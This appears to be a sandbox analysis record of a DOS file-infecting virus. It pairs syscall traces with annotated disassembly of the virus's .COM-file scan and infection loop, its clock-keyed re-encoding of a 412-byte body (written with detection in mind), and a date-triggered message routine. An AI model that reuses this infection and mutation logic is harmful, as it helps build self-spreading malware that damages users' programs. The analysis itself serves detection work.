2018-12-25T11:49:14.319425881Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.322347354Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.325795128Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.329065706Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.330696277Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.344251712Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.347049515Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.353866547Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.36460173Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.365990413Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.368392646Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.369881153Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.3724856Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.37455132Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.377071716Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.378670331Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.38647916Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.389313787Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.396654555Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.403228658Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.404859292Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.408710779Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.410378464Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.413258512Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.416284494Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.41927149Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.421015729Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.429485528Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.433308836Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.440127833Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.447776963Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.449421686Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.452337489Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.454645264Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.457493052Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.460030811Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.46325647Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.465276132Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.481227626Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.484439426Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.491371218Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.498465509Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.50099418Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.504213638Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.505839666Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.509348485Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.512067549Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.520199783Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.522173759Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.531368455Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.534279704Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.541047712Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.558850842Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.560234122Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.56277806Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.565622059Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.568325216Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.570573855Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.574382473Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.576167833Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.58348357Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.588595426Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.597318851Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.600268051Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.602991565Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.61076113Z 79 PC: 12aaa | Find next file (See above)
; Date-triggered message routine (sandbox disassembly excerpt, 16-bit, Intel syntax).
; It starts at the return from the "Get date" call logged on the next line.
2018-12-25T11:49:14.613765382Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe  ; DL = day of month from Get date (INT 21h AH=2Ah); 0x0e = 14
0x12bb1: jne 0x12bbf  ; any other day: go straight to ret; this run logs Terminate next, so nothing was printed
0x12bb3: call 0x12bb6  ; call to the next instruction pushes that instruction's own address
0x12bb6: pop dx  ; DX = run-time offset of 0x12bb6 (self-locating, no fixed load address needed)
0x12bb7: add dx, 0xa  ; DX -> 0x12bc0, the bytes immediately after ret
0x12bbb: mov ah, 9  ; INT 21h AH=09h: print the '$'-terminated string at DS:DX
0x12bbd: int 0x21
0x12bbf: ret
; NOTE(review): everything from 0x12bc0 on is string data that the disassembler decoded as
; instructions after running past ret. Byte values below are reconstructed from the instruction
; encodings; they spell "[C6H12O6] $".
0x12bc0: pop bx  ; 5B = '['
0x12bc1: inc bx  ; 43 = 'C'
0x12bc2: dec ax  ; 36 48 = "6H" (0x36 was decoded as an SS: prefix)
0x12bc4: xor word ptr [bp + si], si  ; 31 32 = "12"
0x12bc6: dec di  ; 4F = 'O'
0x12bc7: pop bp  ; 36 5D = "6]"
0x12bc9: and byte ptr [si], ah  ; 20 24 = " $"; '$' terminates the AH=09h string
0x12bcb: add byte ptr [bp + si + 0x6c], al  ; 00 42 6C = NUL, "Bl": a second string appears to start here
0x12bce: outsw dx, word ptr [si]  ; 6F = 'o'
0x12bcf: outsw dx, word ptr [si]  ; 6F = 'o'
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl  ; 64 20 53 75 = "d Su"
0x12bd4: popaw  ; last decoded item; its length is not visible, so text past "Blood Su" cannot be read from this listing
2018-12-25T11:49:14.616916815Z 76 PC: 12a44 | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":3,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3442,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Directory scan loop (sandbox disassembly excerpt, 16-bit, Intel syntax).
; It starts at the return from the "Get date" call logged on the next line. Each later
; "Find next file" entry in the trace is one more pass through this loop.
2018-12-25T11:49:13.780425682Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4  ; AL = day of week from Get date (INT 21h AH=2Ah, 0 = Sunday); 4 = Thursday
0x12a7f: jne 0x12a8d  ; other weekdays skip the directory change; this run logs "Change current directory" next, so it was not skipped here
0x12a81: call 0x12a84  ; call/pop pair: the code finds its own run-time address
0x12a84: pop dx  ; DX = run-time offset of 0x12a84
0x12a85: add dx, 0x3b  ; DX -> 0x12abf, a path string that is not shown in this trace
0x12a89: mov ah, 0x3b  ; INT 21h AH=3Bh: change current directory to DS:DX
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e  ; INT 21h AH=4Eh: find first matching file
0x12a8f: xor cx, cx  ; CX = 0: attribute mask for the search (normal files)
0x12a91: call 0x12a94  ; same self-locating idiom as above
0x12a94: pop dx
0x12a95: add dx, 0x25  ; DX -> 0x12ab9, the search pattern (not shown; the trace opens SLEEP.COM, so presumably a .COM mask)
0x12a99: int 0x21
0x12a9b: jb 0x12aa3  ; CF set = no match or error: leave via the stub at 0x12aa3
0x12a9d: call 0x12ac2  ; per-file routine; the Open/Read/Write/Close entries in the trace come from inside it
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88  ; exit stub; its target lies outside this excerpt
0x12aa6: mov ah, 0x4f  ; INT 21h AH=4Fh: find next matching file
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3  ; CF set = no more files; the fall-through path is not part of this excerpt
2018-12-25T11:49:13.784212165Z 59 PC: 12a8d | Change current directory
2018-12-25T11:49:13.788706085Z 78 PC: 12a9b | Find first file
2018-12-25T11:49:13.794707526Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:13.803033659Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:13.810807162Z 66 PC: 12b0b | Move file pointer
2018-12-25T11:49:13.812767277Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.817291564Z 66 PC: 12b22 | Move file pointer
2018-12-25T11:49:13.81991217Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
; Re-encoding of the 412-byte body before it is written to the opened file
; (sandbox disassembly excerpt, 16-bit, Intel syntax). It starts at the return from "Get time".
; For detection: the first 0x26 bytes are copied unchanged while the other 374 depend on the
; clock, so a byte signature can only anchor on the leading region (NOTE(review): the two bytes
; patched through [bx] may sit inside it; confirm) or on the logged behaviour instead.
2018-12-25T11:49:13.824079948Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh  ; DH = seconds from Get time (INT 21h AH=2Ch)
0x12b47: add ah, byte ptr [bx]  ; mix with the byte already stored at [bx] (where BX points is set before this excerpt)
0x12b49: mov byte ptr [bx], ah  ; store back; AH is the starting key for the loop below
0x12b4b: mov dl, byte ptr [0x9a]  ; NOTE(review): 0x9A = 0x80 + 0x1A, the file-size low byte if the default DTA is in use; confirm
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1  ; force the value odd, so it is never zero
0x12b55: mov byte ptr [bx + 1], dl  ; store back; DL is the per-byte key increment
0x12b58: mov cx, 0x26  ; 0x26 = 38 bytes
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]  ; first 38 bytes copied unchanged, DS:SI -> ES:DI (both set before this excerpt)
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26  ; 412 - 38 = 374 bytes left to transform
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah  ; byte += key
0x12b66: add ah, dl  ; key += increment, so every byte gets a different key
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx  ; BX restored from the stack; AH=40h takes the file handle in BX
0x12b6c: mov dx, 0xfaa0  ; DS:DX = buffer to write
0x12b6f: mov cx, 0x19c  ; 0x19c = 412, matching "Write 412 bytes" in the trace
0x12b72: mov ah, 0x40  ; INT 21h AH=40h: write to file; the int itself is past the end of this excerpt
2018-12-25T11:49:13.828430064Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-25T11:49:14.276802189Z 87 PC: 12b83 | Get or set file date and time
2018-12-25T11:49:14.278759597Z 62 PC: 12b87 | Close file
2018-12-25T11:49:14.287929591Z 79 PC: 12aaa | Find next file
2018-12-25T11:49:14.295164644Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.302035363Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.308757059Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.311152805Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.314376887Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.3157967Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.322597596Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.335299267Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.338743912Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.341011807Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.34958458Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.353513061Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.36127242Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.368334129Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.370037159Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.373278068Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.37612392Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.379119264Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.381662776Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.38591286Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.387755381Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.410652887Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.414264548Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.420839098Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.427613599Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.43004363Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.432695689Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.434032301Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.437269872Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.439700706Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.442340406Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.447293538Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.455293889Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.45800537Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.465261096Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.471593729Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.47292369Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.476166881Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.477551577Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.480148917Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.48307565Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.485877173Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.488690765Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.497407136Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.500290841Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.507723612Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.516211514Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.518071087Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.520682789Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.522618902Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.526494652Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.528996208Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.537705983Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.540562667Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.548426206Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.551434654Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.559266107Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.566364539Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.568006431Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.571989682Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.573728156Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.576657381Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.580035839Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.583291942Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.585457133Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.593874905Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.59708961Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.603810573Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.607728798Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.610032827Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.617191756Z 79 PC: 12aaa | Find next file (See above)
; Date-triggered message routine (sandbox disassembly excerpt, 16-bit, Intel syntax).
; It starts at the return from the "Get date" call logged on the next line.
2018-12-25T11:49:14.620764753Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe  ; DL = day of month from Get date (INT 21h AH=2Ah); 0x0e = 14
0x12bb1: jne 0x12bbf  ; any other day: go straight to ret; this run logs Terminate next, so nothing was printed
0x12bb3: call 0x12bb6  ; call to the next instruction pushes that instruction's own address
0x12bb6: pop dx  ; DX = run-time offset of 0x12bb6 (self-locating, no fixed load address needed)
0x12bb7: add dx, 0xa  ; DX -> 0x12bc0, the bytes immediately after ret
0x12bbb: mov ah, 9  ; INT 21h AH=09h: print the '$'-terminated string at DS:DX
0x12bbd: int 0x21
0x12bbf: ret
; NOTE(review): everything from 0x12bc0 on is string data that the disassembler decoded as
; instructions after running past ret. Byte values below are reconstructed from the instruction
; encodings; they spell "[C6H12O6] $".
0x12bc0: pop bx  ; 5B = '['
0x12bc1: inc bx  ; 43 = 'C'
0x12bc2: dec ax  ; 36 48 = "6H" (0x36 was decoded as an SS: prefix)
0x12bc4: xor word ptr [bp + si], si  ; 31 32 = "12"
0x12bc6: dec di  ; 4F = 'O'
0x12bc7: pop bp  ; 36 5D = "6]"
0x12bc9: and byte ptr [si], ah  ; 20 24 = " $"; '$' terminates the AH=09h string
0x12bcb: add byte ptr [bp + si + 0x6c], al  ; 00 42 6C = NUL, "Bl": a second string appears to start here
0x12bce: outsw dx, word ptr [si]  ; 6F = 'o'
0x12bcf: outsw dx, word ptr [si]  ; 6F = 'o'
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl  ; 64 20 53 75 = "d Su"
0x12bd4: popaw  ; last decoded item; its length is not visible, so text past "Blood Su" cannot be read from this listing
2018-12-25T11:49:14.623176833Z 76 PC: 12a44 | Terminate with return code (Return code = '4')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3442,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Directory scan loop (sandbox disassembly excerpt, 16-bit, Intel syntax).
; It starts at the return from the "Get date" call logged on the next line. Each later
; "Find next file" entry in the trace is one more pass through this loop.
2018-12-25T11:49:13.79068177Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4  ; AL = day of week from Get date (INT 21h AH=2Ah, 0 = Sunday); 4 = Thursday
0x12a7f: jne 0x12a8d  ; other weekdays skip the directory change; this run logs "Find first file" next, so it was skipped here
0x12a81: call 0x12a84  ; call/pop pair: the code finds its own run-time address
0x12a84: pop dx  ; DX = run-time offset of 0x12a84
0x12a85: add dx, 0x3b  ; DX -> 0x12abf, a path string that is not shown in this trace
0x12a89: mov ah, 0x3b  ; INT 21h AH=3Bh: change current directory to DS:DX
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e  ; INT 21h AH=4Eh: find first matching file
0x12a8f: xor cx, cx  ; CX = 0: attribute mask for the search (normal files)
0x12a91: call 0x12a94  ; same self-locating idiom as above
0x12a94: pop dx
0x12a95: add dx, 0x25  ; DX -> 0x12ab9, the search pattern (not shown; the trace opens SLEEP.COM, so presumably a .COM mask)
0x12a99: int 0x21
0x12a9b: jb 0x12aa3  ; CF set = no match or error: leave via the stub at 0x12aa3
0x12a9d: call 0x12ac2  ; per-file routine; the Open/Read/Write/Close entries in the trace come from inside it
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88  ; exit stub; its target lies outside this excerpt
0x12aa6: mov ah, 0x4f  ; INT 21h AH=4Fh: find next matching file
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3  ; CF set = no more files; the fall-through path is not part of this excerpt
2018-12-25T11:49:13.794458644Z 78 PC: 12a9b | Find first file
2018-12-25T11:49:13.800363446Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:13.807955968Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:13.815061614Z 66 PC: 12b0b | Move file pointer
2018-12-25T11:49:13.816629674Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.825977851Z 66 PC: 12b22 | Move file pointer
2018-12-25T11:49:13.828501603Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
; Re-encoding of the 412-byte body before it is written to the opened file
; (sandbox disassembly excerpt, 16-bit, Intel syntax). It starts at the return from "Get time".
; For detection: the first 0x26 bytes are copied unchanged while the other 374 depend on the
; clock, so a byte signature can only anchor on the leading region (NOTE(review): the two bytes
; patched through [bx] may sit inside it; confirm) or on the logged behaviour instead.
2018-12-25T11:49:13.831485213Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh  ; DH = seconds from Get time (INT 21h AH=2Ch)
0x12b47: add ah, byte ptr [bx]  ; mix with the byte already stored at [bx] (where BX points is set before this excerpt)
0x12b49: mov byte ptr [bx], ah  ; store back; AH is the starting key for the loop below
0x12b4b: mov dl, byte ptr [0x9a]  ; NOTE(review): 0x9A = 0x80 + 0x1A, the file-size low byte if the default DTA is in use; confirm
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1  ; force the value odd, so it is never zero
0x12b55: mov byte ptr [bx + 1], dl  ; store back; DL is the per-byte key increment
0x12b58: mov cx, 0x26  ; 0x26 = 38 bytes
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]  ; first 38 bytes copied unchanged, DS:SI -> ES:DI (both set before this excerpt)
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26  ; 412 - 38 = 374 bytes left to transform
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah  ; byte += key
0x12b66: add ah, dl  ; key += increment, so every byte gets a different key
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx  ; BX restored from the stack; AH=40h takes the file handle in BX
0x12b6c: mov dx, 0xfaa0  ; DS:DX = buffer to write
0x12b6f: mov cx, 0x19c  ; 0x19c = 412, matching "Write 412 bytes" in the trace
0x12b72: mov ah, 0x40  ; INT 21h AH=40h: write to file; the int itself is past the end of this excerpt
2018-12-25T11:49:13.833690283Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-25T11:49:14.277937659Z 87 PC: 12b83 | Get or set file date and time
2018-12-25T11:49:14.280502236Z 62 PC: 12b87 | Close file
2018-12-25T11:49:14.288491297Z 79 PC: 12aaa | Find next file
2018-12-25T11:49:14.291846074Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.298461001Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.304892098Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.306461056Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.309523447Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.310860403Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.313591683Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.316731415Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.319263457Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.320719908Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.329077036Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.331964441Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.339303227Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.347502631Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.349162434Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.352052878Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.354225622Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.357203746Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.359393909Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.36277065Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.36504119Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.372590715Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.376226762Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.382860553Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.389352526Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.390670996Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.39352324Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.394943329Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.397670345Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.400456859Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.403172951Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.404752486Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.412459017Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.416011069Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.422771029Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.430210214Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.431899767Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.434805439Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.437285859Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.440239717Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.443199986Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.446812688Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.448359011Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.455705949Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.459540179Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.466643874Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.473266215Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.475758289Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.478987105Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.480693588Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.484492325Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.487917484Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.496045073Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.498060145Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.506736422Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.509622841Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.516318995Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.524461461Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.526150137Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.529061575Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.531939801Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.534902154Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.537425462Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.541426357Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.54323447Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.550629288Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.553979282Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.561395198Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.564269683Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.566952479Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.574469454Z 79 PC: 12aaa | Find next file (See above)
; Date-triggered message routine (sandbox disassembly excerpt, 16-bit, Intel syntax).
; It starts at the return from the "Get date" call logged on the next line.
2018-12-25T11:49:14.577101836Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe  ; DL = day of month from Get date (INT 21h AH=2Ah); 0x0e = 14
0x12bb1: jne 0x12bbf  ; any other day: go straight to ret; this run logs Terminate next, so nothing was printed
